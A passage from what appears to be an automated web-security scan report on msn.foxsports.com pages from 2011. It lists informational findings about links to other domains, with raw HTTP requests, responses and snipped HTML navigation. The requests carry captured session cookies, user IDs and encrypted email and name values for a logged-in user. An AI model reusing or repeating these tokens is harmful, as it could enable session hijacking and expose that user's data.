pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 42110
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fc156a;path=/
Expires: Sat, 08 Jan 2011 01:13:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>


   
...[SNIP]...
</script>
   <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<br>&#8226;&nbsp;<a blurb="Wisconsin running back John Clay says he will enter the NFL draft." href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&feedID=5059">RB Clay, too</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
</span> &nbsp;<a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">Privacy</a>
...[SNIP]...
<span class="last"><a href="http://g.msn.com/0nwenus0/AK/18" target="_blank">Terms of Use</a>
...[SNIP]...
<span class="first">Portions Copyright &#169; 2010 <a href="http://www.stats.com" target="_blank">STATS LLC</a>
...[SNIP]...

10.12. http://msn.foxsports.com/fantasy/football/frankspicks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/football/frankspicks/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /fantasy/football/frankspicks/?nicmp=HPMKTMOD&nichn=FRANKSPICKS&niseg=LNK HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 24863
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscdQt+GmTLC98LpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl01_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/JQHBz5b08YY/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711" target="_blank">Jim Harbaugh to be 49ers' next coach</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl02_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/C4Z45yGK7N8/jim-harbaugh-san-francisco-49ers-agree-010711" target="_blank">Glazer: Harbaugh to 49ers</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl03_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/bcCko-zeSrA/miami-dolphins-tony-sparano-jim-harbaugh-retain-head-coach-010611" target="_blank">Sources: Dolphins retain Sparano</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl04_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/LXhuA5oTrFQ/NFL-coaches-hired-fired-interim-carousel-rumors-010211" target="_blank">2011 NFL coaching carousel</a>
...[SNIP]...
<li class="wis_newsLinkItem"><a id="ctl00_SecondaryColumn_ctl01_NewsRepeater_ctl05_NewsLink" href="http://feedproxy.google.com/~r/foxsports/RSS/NFL/~3/tGHoZ9otzZc/Ravens-Ed-Reed-brother-wanted-by-police-010711" target="_blank">Police looking for Ed Reed's brother</a>
...[SNIP]...
<div>
               <a href="http://foxsports.seenon.com/?v=fox-sports_cleatus-robot&ecid=PRF-SM-500044&PA=FoxSportsNFLCleatus_300X100 " target="_blank" class="wis_cleatusPromo"></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li><a href="http://www.foxcareers.com" title="Jobs">Jobs</a>
...[SNIP]...
<li title=" Tickets"><a href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-1-2-0-0-0-0&amp;pid=foxsports'" title="Tickets">Tickets</a>
...[SNIP]...
<li><a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li><a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li><a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li><a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last"><a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
            <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js" language="javascript"></script>
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" style="display: none" width="0" height="0" alt="" /> </noscript>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.13. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 235914
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=11
Date: Fri, 07 Jan 2011 21:52:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
